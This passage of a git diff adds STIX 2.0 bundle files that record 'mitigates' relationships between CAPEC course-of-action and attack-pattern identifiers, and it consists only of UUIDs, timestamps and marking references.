"identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03", + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--73230c2c-7e73-4b77-85f8-a92d7cf4a6a2.json b/capec/relationship/relationship--73230c2c-7e73-4b77-85f8-a92d7cf4a6a2.json new file mode 100644 index 0000000000..65bbf10107 --- /dev/null +++ b/capec/relationship/relationship--73230c2c-7e73-4b77-85f8-a92d7cf4a6a2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c2a98aa9-48d5-4127-84c2-0c2188a59a22", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--73230c2c-7e73-4b77-85f8-a92d7cf4a6a2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2cf7aa67-1388-42af-a7a4-91efe4879ba6", + "target_ref": "attack-pattern--5acb26f6-90bc-47de-aca8-5493b5824204", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--74079054-04f5-4710-b31c-dcab62910aa7.json b/capec/relationship/relationship--74079054-04f5-4710-b31c-dcab62910aa7.json new file mode 100644 index 0000000000..df1ecf716c --- /dev/null +++ b/capec/relationship/relationship--74079054-04f5-4710-b31c-dcab62910aa7.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b262fca5-c47f-40e1-b206-6a2408d9362a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--74079054-04f5-4710-b31c-dcab62910aa7", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0ca911eb-ac2a-473f-92a6-64e6cc63b937", + "target_ref": "attack-pattern--a3d8031b-f32f-4ab6-b778-3c06dc20dfb2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--745195e4-fadd-4751-b1e3-844097302f3a.json b/capec/relationship/relationship--745195e4-fadd-4751-b1e3-844097302f3a.json new file mode 100644 index 0000000000..389cb56292 --- /dev/null +++ b/capec/relationship/relationship--745195e4-fadd-4751-b1e3-844097302f3a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--57af31b7-df17-4c36-a3f9-2e1e821c45c0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--745195e4-fadd-4751-b1e3-844097302f3a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a0e7a602-41ad-4d2b-91ab-2d7d76608c7b", + "target_ref": "attack-pattern--70cee10e-762f-49df-bd81-d972d3dd7c11", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--74bd61aa-f7c8-4f10-8a1c-33adc298bc27.json b/capec/relationship/relationship--74bd61aa-f7c8-4f10-8a1c-33adc298bc27.json new file mode 100644 index 0000000000..8e865f1c5e --- /dev/null +++ b/capec/relationship/relationship--74bd61aa-f7c8-4f10-8a1c-33adc298bc27.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9b0d9c32-f859-414e-a704-90c5833d23cb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--74bd61aa-f7c8-4f10-8a1c-33adc298bc27", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4603ddfb-30b5-4137-826f-1946d59b59e9", + "target_ref": "attack-pattern--d01b1014-6dd4-42b3-92c4-ec82745071e8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--74c821e2-a381-4185-b011-38540d380f0d.json b/capec/relationship/relationship--74c821e2-a381-4185-b011-38540d380f0d.json new file mode 100644 index 0000000000..d37716105d --- /dev/null +++ b/capec/relationship/relationship--74c821e2-a381-4185-b011-38540d380f0d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--2b88b24e-2c94-413e-8fc1-fb393c1d2652", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--74c821e2-a381-4185-b011-38540d380f0d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b738987e-cbcc-4aa9-8bc3-b46daf33e1f0", + "target_ref": "attack-pattern--83a895c1-df98-4aa4-be2d-ace0108e64be", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--74fa2e15-cdae-495a-9942-01806f15ac6d.json b/capec/relationship/relationship--74fa2e15-cdae-495a-9942-01806f15ac6d.json new file mode 100644 index 0000000000..c1e766194a --- /dev/null +++ b/capec/relationship/relationship--74fa2e15-cdae-495a-9942-01806f15ac6d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c5742cdf-8629-4202-ab80-ddd8117e8be0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--74fa2e15-cdae-495a-9942-01806f15ac6d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--92a14d9f-b461-40db-9a7e-00ac104eb828", + "target_ref": "attack-pattern--34578435-31bc-4c4d-bb0a-61a3ab909633", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--75675b2e-e3b6-4fb1-8ca5-6620f4965b2e.json b/capec/relationship/relationship--75675b2e-e3b6-4fb1-8ca5-6620f4965b2e.json new file mode 100644 index 0000000000..2f3be6a9cf --- /dev/null +++ b/capec/relationship/relationship--75675b2e-e3b6-4fb1-8ca5-6620f4965b2e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6d181e68-fa88-4c01-aa4a-b0fb4439162b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--75675b2e-e3b6-4fb1-8ca5-6620f4965b2e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--23e84cfc-4f98-403a-a6a5-9e1f288a238a", + "target_ref": "attack-pattern--2d7b12ba-47d5-4617-be01-dfa415317b93", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--75cedfaa-3c9f-4d80-909e-6bbd011bf5aa.json b/capec/relationship/relationship--75cedfaa-3c9f-4d80-909e-6bbd011bf5aa.json new file mode 100644 index 0000000000..65a7397fc9 --- /dev/null +++ b/capec/relationship/relationship--75cedfaa-3c9f-4d80-909e-6bbd011bf5aa.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--75ea9e9d-f79e-4399-b90f-0bcfca765d84", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--75cedfaa-3c9f-4d80-909e-6bbd011bf5aa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d57aef14-fcf9-41f7-a9a3-e071e4282415", + "target_ref": "attack-pattern--bcec667c-66e5-43e5-a836-bbbc36824938", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--75ec102d-bbc8-4693-87a9-1d2bdbae06ed.json b/capec/relationship/relationship--75ec102d-bbc8-4693-87a9-1d2bdbae06ed.json new file mode 100644 index 0000000000..735ff70d9b --- /dev/null +++ b/capec/relationship/relationship--75ec102d-bbc8-4693-87a9-1d2bdbae06ed.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5b0ea10e-bec7-42ff-a957-197bc35100ae", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--75ec102d-bbc8-4693-87a9-1d2bdbae06ed", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--2d0a4aa4-687f-4549-bc2d-0c2d6b971dff", + "target_ref": "attack-pattern--35abccd5-51c3-4107-9ff9-956e33d8a6a6", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--75f29bbb-4c75-473b-b539-94f37ac9dd22.json b/capec/relationship/relationship--75f29bbb-4c75-473b-b539-94f37ac9dd22.json new file mode 100644 index 0000000000..b847706f26 --- /dev/null +++ b/capec/relationship/relationship--75f29bbb-4c75-473b-b539-94f37ac9dd22.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f2953828-a7b1-4b88-b282-ddd1dd8fd4b1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--75f29bbb-4c75-473b-b539-94f37ac9dd22", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--52ef316b-8bda-44a7-962e-41f8a0b47c62", + "target_ref": "attack-pattern--6c510676-03ad-4a8e-835b-f2caea51b785", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7612b2fc-c9b9-4a83-ba97-72481e466395.json b/capec/relationship/relationship--7612b2fc-c9b9-4a83-ba97-72481e466395.json new file mode 100644 index 0000000000..25becfc375 --- /dev/null +++ b/capec/relationship/relationship--7612b2fc-c9b9-4a83-ba97-72481e466395.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--eee425af-43d5-4cf5-8014-25d9c005edea", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7612b2fc-c9b9-4a83-ba97-72481e466395", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--54ded23f-205f-4485-b1fb-f229717cd4d0", + "target_ref": "attack-pattern--21bfa3d5-3aa2-450e-bbe4-5bf8f49e3c2f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--762c6f91-15c4-4702-9f8c-9f3c573029eb.json b/capec/relationship/relationship--762c6f91-15c4-4702-9f8c-9f3c573029eb.json new file mode 100644 index 0000000000..d3a89ff78c --- /dev/null +++ b/capec/relationship/relationship--762c6f91-15c4-4702-9f8c-9f3c573029eb.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d85a8ff1-dbd0-4b86-8a19-9ae6336b23ff", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--762c6f91-15c4-4702-9f8c-9f3c573029eb", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d2e2f760-3e91-480d-a010-51c7214317af", + "target_ref": "attack-pattern--482b3970-03d2-4537-a2db-09570ed891e7", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--766d79dd-2f1c-40d2-bad8-1bcedb71e216.json b/capec/relationship/relationship--766d79dd-2f1c-40d2-bad8-1bcedb71e216.json new file mode 100644 index 0000000000..7742b3c32b --- /dev/null +++ b/capec/relationship/relationship--766d79dd-2f1c-40d2-bad8-1bcedb71e216.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--607cd9c6-f177-4c64-9631-ab448c89b576", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--766d79dd-2f1c-40d2-bad8-1bcedb71e216", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac33e0a7-99c4-45e7-a157-59e5de2d870a", + "target_ref": "attack-pattern--35464428-e136-4677-aaa0-19da2fe51c55", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--768422f2-054e-4557-9e91-91263b11fbc0.json b/capec/relationship/relationship--768422f2-054e-4557-9e91-91263b11fbc0.json new file mode 100644 index 0000000000..c0d94e9eec --- /dev/null +++ b/capec/relationship/relationship--768422f2-054e-4557-9e91-91263b11fbc0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1015972f-b9a6-46a4-9b46-99269d71dcc1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--768422f2-054e-4557-9e91-91263b11fbc0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7d9210eb-2a81-42e2-91a1-6bae4c65ca16", + "target_ref": "attack-pattern--0a4e6d07-4253-4194-a606-477cb09a9f36", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--76e14906-b13a-49dd-b240-38ba08c42eaf.json b/capec/relationship/relationship--76e14906-b13a-49dd-b240-38ba08c42eaf.json new file mode 100644 index 0000000000..7b68c6d983 --- /dev/null +++ b/capec/relationship/relationship--76e14906-b13a-49dd-b240-38ba08c42eaf.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5439a584-1989-42b4-a7c8-2920f5a5f831", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--76e14906-b13a-49dd-b240-38ba08c42eaf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1", + "target_ref": "attack-pattern--285f4e6f-6fa1-4005-989a-2b1e86e8f1e9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--77174f86-8a8d-442b-a432-c71245fddf54.json b/capec/relationship/relationship--77174f86-8a8d-442b-a432-c71245fddf54.json new file mode 100644 index 0000000000..f4432470af --- /dev/null +++ b/capec/relationship/relationship--77174f86-8a8d-442b-a432-c71245fddf54.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--31b45b63-4426-4756-a501-6a57d6a09380", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--77174f86-8a8d-442b-a432-c71245fddf54", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--28d4d037-94a9-4035-9477-678d3e0be043", + "target_ref": "attack-pattern--11c647fb-33fc-444c-b578-617cb2205def", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--77c41198-2391-422c-81fa-0ae498f0d2bf.json b/capec/relationship/relationship--77c41198-2391-422c-81fa-0ae498f0d2bf.json new file mode 100644 index 0000000000..0108a52bdd --- /dev/null +++ b/capec/relationship/relationship--77c41198-2391-422c-81fa-0ae498f0d2bf.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--dfe7d8c9-05b9-43c5-bef5-046f98af7aa5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--77c41198-2391-422c-81fa-0ae498f0d2bf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--aadd3dab-f155-49de-9d9f-88578ad5ecc4", + "target_ref": "attack-pattern--71e3552d-601e-479b-9b83-80ac2cd3ac0e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--77f0bb36-228a-4921-abd2-9812980193c8.json b/capec/relationship/relationship--77f0bb36-228a-4921-abd2-9812980193c8.json new file mode 100644 index 0000000000..10b73b4b45 --- /dev/null +++ b/capec/relationship/relationship--77f0bb36-228a-4921-abd2-9812980193c8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--dcc0dbd1-a41e-47c9-bfb6-6508b2ade7d1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--77f0bb36-228a-4921-abd2-9812980193c8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6988f778-25d5-4902-ae93-e06c754ab230", + "target_ref": "attack-pattern--03947e14-b3b5-4838-823c-0af6f255c25a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--783278fb-0cbe-446a-a559-7d114e06706a.json b/capec/relationship/relationship--783278fb-0cbe-446a-a559-7d114e06706a.json new file mode 100644 index 0000000000..92cd134822 --- /dev/null +++ b/capec/relationship/relationship--783278fb-0cbe-446a-a559-7d114e06706a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a28466ef-92e4-4a9a-b68a-c0cd1167ccfd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--783278fb-0cbe-446a-a559-7d114e06706a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf", + "target_ref": "attack-pattern--9779126e-8180-45f2-befc-2fe8434d1724", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--783d775a-411a-43bd-b200-f4740432645c.json b/capec/relationship/relationship--783d775a-411a-43bd-b200-f4740432645c.json new file mode 100644 index 0000000000..74637e830b --- /dev/null +++ b/capec/relationship/relationship--783d775a-411a-43bd-b200-f4740432645c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9a2cf490-cb2d-4113-ad58-9dcd7f5a9b67", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--783d775a-411a-43bd-b200-f4740432645c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--d2766301-f13d-4357-b351-decc874545f9", + "target_ref": "attack-pattern--f1d3ef87-d787-4db4-8964-5cdc6d02242b", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--7857a887-19b6-4c8a-8643-4d442a70e0fa.json b/capec/relationship/relationship--7857a887-19b6-4c8a-8643-4d442a70e0fa.json new file mode 100644 index 0000000000..30fc05f005 --- /dev/null +++ b/capec/relationship/relationship--7857a887-19b6-4c8a-8643-4d442a70e0fa.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--82366923-63d6-49a4-9cb9-e586a571a1fc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--7857a887-19b6-4c8a-8643-4d442a70e0fa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a9cece7b-a84a-4af1-8e06-3f188167a17c", + "target_ref": "attack-pattern--c1a553a6-7db5-4b2f-95ef-434f08a2c84e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--789b1bc9-99a8-4b08-a8bc-f1de0cf0ac74.json b/capec/relationship/relationship--789b1bc9-99a8-4b08-a8bc-f1de0cf0ac74.json new file mode 100644 index 0000000000..74a7086c39 --- /dev/null +++ b/capec/relationship/relationship--789b1bc9-99a8-4b08-a8bc-f1de0cf0ac74.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d91aeefb-0787-4654-9524-adb13dee9a2e", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--789b1bc9-99a8-4b08-a8bc-f1de0cf0ac74", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f1774e8-9dca-4cd7-820a-f1e7a4c29bb2", + "target_ref": "attack-pattern--34f01011-987b-4447-8663-e32f695409cc", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--78b25ab4-16a8-48d9-a2cb-2a01bee50d6f.json b/capec/relationship/relationship--78b25ab4-16a8-48d9-a2cb-2a01bee50d6f.json new file mode 100644 index 0000000000..f8bfe575f1 --- /dev/null +++ b/capec/relationship/relationship--78b25ab4-16a8-48d9-a2cb-2a01bee50d6f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e5832324-b850-4648-ab9c-e5be5dfe53bd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--78b25ab4-16a8-48d9-a2cb-2a01bee50d6f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b12245aa-fc31-4e4c-b144-05c0780a5b39", + "target_ref": "attack-pattern--5181a9cd-e899-469e-9969-b7aef0d78db5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--78b35bc5-b6e0-460c-9fa3-fc47a4ff64f9.json b/capec/relationship/relationship--78b35bc5-b6e0-460c-9fa3-fc47a4ff64f9.json new file mode 100644 index 0000000000..28c7d3cb52 --- /dev/null +++ b/capec/relationship/relationship--78b35bc5-b6e0-460c-9fa3-fc47a4ff64f9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--834ee8cf-7d05-459c-821d-8e6d56920276", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--78b35bc5-b6e0-460c-9fa3-fc47a4ff64f9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--04440c70-46f9-4007-9983-336aa6149e9f", + "target_ref": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--78e4fddf-de75-4b28-ae1e-1baf0fd5ed17.json b/capec/relationship/relationship--78e4fddf-de75-4b28-ae1e-1baf0fd5ed17.json new file mode 100644 index 0000000000..bcb940487c --- /dev/null +++ b/capec/relationship/relationship--78e4fddf-de75-4b28-ae1e-1baf0fd5ed17.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c3c54187-0091-4036-9de9-612700885f2f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--78e4fddf-de75-4b28-ae1e-1baf0fd5ed17", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3fb0274e-adc7-4bec-a0e9-8d6d208ae5e9", + "target_ref": "attack-pattern--14e62b12-3297-4588-9652-a4443fab37fe", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--78ebf4ad-2c8b-4125-96ec-04f668043e85.json b/capec/relationship/relationship--78ebf4ad-2c8b-4125-96ec-04f668043e85.json new file mode 100644 index 0000000000..e122c5b2ac --- /dev/null +++ b/capec/relationship/relationship--78ebf4ad-2c8b-4125-96ec-04f668043e85.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9aa5a45a-6a6c-4031-8408-eaa188260229", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--78ebf4ad-2c8b-4125-96ec-04f668043e85", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2252944-e402-49b9-aedf-9c19aea7d0af", + "target_ref": "attack-pattern--70cee10e-762f-49df-bd81-d972d3dd7c11", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--795d43b4-83aa-41d3-8265-230037287312.json b/capec/relationship/relationship--795d43b4-83aa-41d3-8265-230037287312.json new file mode 100644 index 0000000000..ff31a052c1 --- /dev/null +++ b/capec/relationship/relationship--795d43b4-83aa-41d3-8265-230037287312.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b2f24fae-0e67-43c2-9634-3bbef10511d6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--795d43b4-83aa-41d3-8265-230037287312", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c148e0e3-6776-4412-a22d-fe0ab64e3107", + "target_ref": "attack-pattern--6627f4c5-d918-40b5-bb4a-8ade04d5e926", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--79bbd502-a2fb-4f28-83b4-d95183490f1c.json b/capec/relationship/relationship--79bbd502-a2fb-4f28-83b4-d95183490f1c.json new file mode 100644 index 0000000000..8aaf20e3df --- /dev/null +++ b/capec/relationship/relationship--79bbd502-a2fb-4f28-83b4-d95183490f1c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f9a51597-25ad-4953-936e-46214c4657ed", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--79bbd502-a2fb-4f28-83b4-d95183490f1c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": 